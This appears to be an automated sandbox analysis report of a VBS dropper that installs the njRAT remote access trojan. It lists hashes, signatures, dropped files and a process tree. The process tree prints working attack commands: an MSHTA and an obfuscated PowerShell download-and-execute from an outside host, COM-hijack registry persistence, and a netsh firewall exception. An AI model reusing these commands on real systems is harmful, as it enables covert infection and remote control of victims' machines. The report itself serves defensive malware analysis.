Analysis

  • max time kernel
    135s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-08-2022 18:31

General

  • Target

    DWRNHNKWSJEHWYPNYOGGOP.vbs

  • Size

    1KB

  • MD5

    43f89bd927a7e80c8240c61617dee7bf

  • SHA1

    6a8ab5c11c1afd276cf5dbb7b125cff26080459f

  • SHA256

    f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a

  • SHA512

    f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://tradeguru.com.pk/enc2.txt

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Blocklisted process makes network request 3 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"
    1⤵
      PID:4684
    • C:\Windows\system32\MSHTA.EXE
      MSHTA.EXE https://tradeguru.com.pk/enc2.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"
          3⤵
            PID:632
      • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
        POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
        1⤵
        • Process spawned unexpected child process
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1436
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
            3⤵
            • Modifies registry class
            • Modifies registry key
            PID:2960
          • C:\Windows\system32\reg.exe
            REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
            3⤵
            • Registers COM server for autorun
            • Modifies registry class
            • Modifies registry key
            PID:2268
          • C:\Windows\system32\cmd.exe
            cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"
              4⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3568
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1272
                • C:\Windows\SysWOW64\netsh.exe
                  netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE
                  6⤵
                  • Modifies Windows Firewall
                  PID:4072

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat
        Filesize

        706B

        MD5

        6a90128893777a59d404d46d3e967104

        SHA1

        e2b70c13764f2f61aa8503999670542237046bc4

        SHA256

        b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319

        SHA512

        5e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1
        Filesize

        3KB

        MD5

        43864d67842266f76a91dc4aee7338c7

        SHA1

        022259ecb6970f6790c329e36b94402ba815b5e0

        SHA256

        c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf

        SHA512

        32bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs
        Filesize

        1KB

        MD5

        d6a5f499f7164e0d61a5b8a0b4900fba

        SHA1

        054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9

        SHA256

        5b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44

        SHA512

        2129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2

      • C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1
        Filesize

        604KB

        MD5

        ab1fce3ab2f6f211da8f8dc30c2b3060

        SHA1

        ae0dff660b20f9209a66029d44b048a63cc80336

        SHA256

        7cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca

        SHA512

        ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
        Filesize

        3KB

        MD5

        00e7da020005370a518c26d5deb40691

        SHA1

        389b34fdb01997f1de74a5a2be0ff656280c0432

        SHA256

        a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

        SHA512

        9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0ab03b4ab0ee8273a1eea28cef1ca1e7

        SHA1

        8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

        SHA256

        695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

        SHA512

        7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        171c8388c36c7ff24bff6d83366bcbd6

        SHA1

        b457641f8c88a56590921ce729d3111a8964107a

        SHA256

        cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621

        SHA512

        94889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        a6c9d692ed2826ecb12c09356e69cc09

        SHA1

        def728a6138cf083d8a7c61337f3c9dade41a37f

        SHA256

        a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

        SHA512

        2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

      • memory/632-137-0x0000000000000000-mapping.dmp
      • memory/1128-144-0x0000000000000000-mapping.dmp
      • memory/1272-158-0x0000000005760000-0x00000000057FC000-memory.dmp
        Filesize

        624KB

      • memory/1272-163-0x0000000005E50000-0x0000000005E5A000-memory.dmp
        Filesize

        40KB

      • memory/1272-159-0x0000000005E60000-0x0000000006404000-memory.dmp
        Filesize

        5.6MB

      • memory/1272-160-0x00000000058B0000-0x0000000005942000-memory.dmp
        Filesize

        584KB

      • memory/1272-162-0x0000000005DB0000-0x0000000005E16000-memory.dmp
        Filesize

        408KB

      • memory/1272-152-0x0000000000400000-0x0000000000410000-memory.dmp
        Filesize

        64KB

      • memory/1272-153-0x000000000040BBBE-mapping.dmp
      • memory/1436-140-0x0000000000000000-mapping.dmp
      • memory/1808-134-0x0000000000000000-mapping.dmp
      • memory/1808-148-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/1808-136-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/2268-143-0x0000000000000000-mapping.dmp
      • memory/2960-142-0x0000000000000000-mapping.dmp
      • memory/3568-155-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/3568-147-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/3568-145-0x0000000000000000-mapping.dmp
      • memory/4072-161-0x0000000000000000-mapping.dmp
      • memory/4168-157-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4168-139-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-131-0x000001B54A770000-0x000001B54A792000-memory.dmp
        Filesize

        136KB

      • memory/4624-151-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-133-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB

      • memory/4624-132-0x00007FFE84260000-0x00007FFE84D21000-memory.dmp
        Filesize

        10.8MB